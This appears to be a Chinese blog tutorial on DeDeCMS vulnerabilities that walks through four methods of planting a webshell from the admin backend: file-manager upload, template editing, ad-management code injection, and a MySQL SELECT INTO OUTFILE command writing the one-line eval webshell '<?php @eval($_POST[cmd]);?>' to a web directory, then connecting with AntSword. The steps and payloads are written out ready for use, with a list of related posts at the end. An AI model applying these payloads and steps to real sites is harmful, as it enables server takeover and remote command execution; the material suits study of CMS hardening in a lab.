CMS漏洞-DeDeCMS篇

一.姿势一:通过⽂件管理器上传WebShell

1.首先我们搭建网站然后进行登录

2.模块👉文件管理器👉文件上传

3.新建一个1.php文件,内容为:

<?php phpinfo();?>

选择1.php文件上传

4.访问网站根目录下的1.php,发现代码成功执行,说明我们的木马上传成功!!

二.姿势二:修改模板文件拿WebShell

1.模板👉默认模板管理👉index.htm👉修改

2.插入代码:

<?php phpinfo();?>并保存

3.生成👉更新主机html,主页位置修改为index.php,生成静态,更新主页html

4.访问主页,发现主页为phpinfo界面,说明我们植入的代码有效!

三.姿势三:后台任意命令执⾏拿WebShell

1.模块👉广告管理

在内容上写入代码:

<?php phpinfo();?>

2.上传成功后查看代码,并复制引号内容

3.访问后发现页面无回显

4.现在我们将代码换为一句话木马:

<?php @eval($_POST[cmd]);?>

5.跟上述步骤一样复制引号内容并访问

6.使用蚁剑连接,连接成功!!

说明木马成功植入

四.姿势四:通过后台sql命令执⾏拿webshell

1.系统👉sql命令行工具

在命令行输入select @@basedir;

获取mysql路径,由此猜测⽹站绝对路径

2.在命令行输入:

select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/dedecms/uploads/webshell.php'

上传一句话木马到webshell.php文件

3.我们在网站根目录下发现了webshell.php文件,内容为一句话木马

4.我们访问木马文件并复制其绝对路径

5.连接成功!

木马植入成功!

相关推荐
Guheyunyi2 小时前
智能守护:视频安全监测系统的演进与未来
大数据·人工智能·科技·安全·信息可视化
Traced back3 小时前
WinForms 线程安全三剑客详解
安全·c#·winform
汉堡包0013 小时前
【网安基础】--内网代理转发基本流程(正向与反向代理)
安全·web安全·php
桌面运维家5 小时前
vDisk VOI/IDV权限管理怎么做?安全方案详解
安全
世界尽头与你5 小时前
(修复方案)kibana 未授权访问漏洞
安全·网络安全·渗透测试
xixixi777776 小时前
今日 AI 、通信、安全行业前沿日报(2026 年 2 月 4 日,星期三)
大数据·人工智能·安全·ai·大模型·通信·卫星通信
蓝队云计算7 小时前
蓝队云部署OpenClaw深度指南:避坑、优化与安全配置,从能用做到好用
运维·安全·云计算
lingggggaaaa7 小时前
安全工具篇&Go魔改二开&Fscan扫描&FRP代理&特征消除&新增扩展&打乱HASH
学习·安全·web安全·网络安全·golang·哈希算法
Black蜡笔小新10 小时前
国密GB35114平台EasyGBS筑牢安防安全防线,GB28181/GB35114无缝接入
网络·安全·音视频·gb35114
2401_8658548810 小时前
安全为先|咕噜分发平台:一站式App漏洞分析与安全分发解决方案
安全